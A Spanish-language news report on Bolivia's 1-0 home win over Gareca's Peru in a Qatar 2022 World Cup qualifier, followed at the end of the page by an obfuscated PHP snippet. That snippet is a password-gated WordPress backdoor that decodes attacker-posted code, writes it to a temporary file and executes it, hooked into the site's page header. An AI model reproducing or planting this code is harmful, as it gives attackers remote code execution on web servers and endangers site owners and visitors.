Bolivia le ganó al Perú de Gareca y lo complicó más

Foto: Conmebol

Bolivia derrotó a Perú 1-0, en el estadio Hernando Siles de La Paz, y complicó más las chances del equipo dirigido por Ricardo Gareca de volver a clasificar a un Mundial.

En el primer tiempo, Bolivia fue más vertical y directo, Perú tuvo un juego más asociado y elaborado. Las dos chances más claras pertenecieron al equipo de Gareca, y en ambas respondió muy bien Carlos Lampe; ante un remate de Gabriel Costa, a los 33 minutos, y ante un zurdazo de Marcos López, a los 35.

En el segundo tiempo, los locales se adueñaron del terreno y presionaron bien alto, asfixiando a Perú. Les faltaba la puntada final, aunque tuvieron una chance muy neta: un fuerte cabezazo de Carmelo Algañaraz, tapado abajo por Pedro Gallese, el rebote cercano le quedó a Marcelo Martins quien sacó un potente remate que pegó en la cara del arquero peruano, a los 5 minutos.

Luego mantuvo el dominio Bolivia, pero sin causarle mayor sobresaltos al contenido Perú.

La expulsión de Henry Vaca, ingresado trece minutos antes, por pegarle una violenta e innecesaria patada a Alexander Callens, desorientó a Bolivia y le permitió una leve reacción a Perú.

Sin embargo, a los 36 minutos, los dirigidos por el venezolano César Farías festejaron su gol. Una buena proyección y buen centro de Rodrigo Ramallo desde la derecha, se ensució con remates y rebotes, hasta que cayó justa para el zurdazo del recién ingresado Ramiro Vaca. El disparo pegó en Callens y se introdujo en el arco de Gallese.

Perú visitará a Argentina el próximo jueves a las 20.30, en la continuidad de esta triple fecha de eliminatorias sudamericanas para Qatar 2022.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}